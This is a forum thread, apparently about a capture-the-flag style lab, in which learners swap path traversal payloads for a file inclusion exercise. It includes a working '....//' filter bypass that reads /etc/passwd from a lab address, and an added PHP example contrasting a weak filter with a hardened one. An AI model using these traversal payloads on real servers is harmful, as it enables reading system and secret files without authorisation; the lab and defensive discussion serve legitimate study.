FILE INCLUSION - Basic Bypasses Question

Hello there,

I tried all of the below, both URL-encoded and in clear.
What am I doing wrong?

languages/es.php

./languages/…/…/…/…/…/es.php

…//languages/es.php

…//languages/…/…/…/…/etc/passwd

RandomAndNonRandomName/…/…/…/etc/passwd/././././././././././.(2048 thing. Goes and goes.)

./languages/…/…/…/…/…/flag.txt%00

…//languages/…/…/…/…/…/flag.txt

languages/…/…/…/…/…/flag.txt%00

./languages/…/…/…/…/…/flag.txt%00

languages/…/…/…/…/…/flag.txt

.\languages..........\flag.txt%00

languages/…/…/…/…/…/flag.txt%00

./languages/etc/passwd%00

1 Like

There are three dots ... between the slashes, but Unix uses two dots as the parent directory name ..

There were two before I posted.
It changed to three after I posted.

@xtal, do you have any idea?

Sorry. No specific idea.

The three points were an obvious error. But it was just an error in presentation, not the real error.

I would start with ./../etc/passwd and then insert more /../ until I can access the passwd file. You know the absolute path and filename of the passwd file, so I would try to access this file first. If you are on a Unix machine, there will be the file /etc/passwd.

Well… Still couldn’t resolve it.

Hey,
Did you solve it?
I have been trying for 3 days…

I did everything in the training page but couldn't solve it…

Does anybody have a solution to this?
I went through the cheat sheet, encoded, then double-encoded all of the examples; still unable to open the passwd file, not to mention the actual task.

1 Like

When you guys first visit a page the parameter includes ‘languages/page/’. What if the code checks if parameter contains ‘languages’? :thinking:

If you want, PM me; I can provide an automatic tool that solves LFI automatically.

This one works.

http://206.189.124.56:32620/index.php?language=languages///....//....//....//....//....//....//.....//....//....//....//etc/passwd

3 Likes

Thank you, it works indeed!

1 Like

languages///....//....//....//.....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd

1 Like

One way I found out was to try and get back to the original file to make sure I had the encoding correct, for example:

languages/....//languages/en.php

Should take you back to the en.php page.
From there, I changed en.php to flag.txt

languages/....//flag.txt

Then it’s just a guessing game on how many ....// you need to add.
Unless there is a specific way to find out how many …// ?
I was confused though because I thought the flag file was in the languages directory since it said /flag.txt

1 Like
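
Why `....//` can get through where a plain `../` does not, shown as an added example (not code from the thread or from the lab, whose server code is not shown): `weak_resolve` assumes a single-pass `str_replace` filter plus the `languages` substring check guessed at earlier in the thread, and `safe_resolve` is one hardened alternative. Both function names, the temp directory and the sample inputs are constructed for illustration.

```php
<?php
// Added example: the lab's server code is not shown in the thread, so both
// functions below are assumptions written to illustrate the behaviour discussed.

// Assumed weak filter: ONE non-recursive pass that deletes "../", followed by
// the substring check guessed at in the thread.
function weak_resolve(string $param): ?string
{
    $filtered = str_replace('../', '', $param);   // output is not re-scanned
    if (strpos($filtered, 'languages') === false) {
        return null;
    }
    return $filtered;                             // this string would reach include()
}

// Hardened form: accept only a two-letter language code, build the path on the
// server side, then confirm the canonical path is still inside languages/.
function safe_resolve(string $lang, string $baseDir): ?string
{
    if (!preg_match('/\A[a-z]{2}\z/', $lang)) {
        return null;
    }
    $root = realpath($baseDir . '/languages');
    $path = realpath($baseDir . '/languages/' . $lang . '.php');
    if ($root === false || $path === false) {
        return null;                              // missing directory or file
    }
    $prefix = $root . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo directory and inputs; the last weak input uses the
// "....//" pattern that was posted in the thread.
$base = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
mkdir($base . '/languages', 0700, true);
file_put_contents($base . '/languages/es.php', "<?php // constructed sample\n");

$weakInputs = ['languages/es.php', 'languages/../../etc/passwd',
               'languages///....//....//etc/passwd'];
foreach ($weakInputs as $in) {
    printf("weak %-36s => %s\n", $in, var_export(weak_resolve($in), true));
}
foreach (['es', 'xx', '....//etc/passwd'] as $in) {
    printf("safe %-36s => %s\n", $in, var_export(safe_resolve($in, $base), true));
}
```

Under the assumed filter, a plain `../` is deleted outright, while each `....//` collapses back into `../` after the single pass, so the filtered string still walks out of the directory; the hardened function never places request input into the path unless it is a two-letter code.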

Any hints on how to solve this?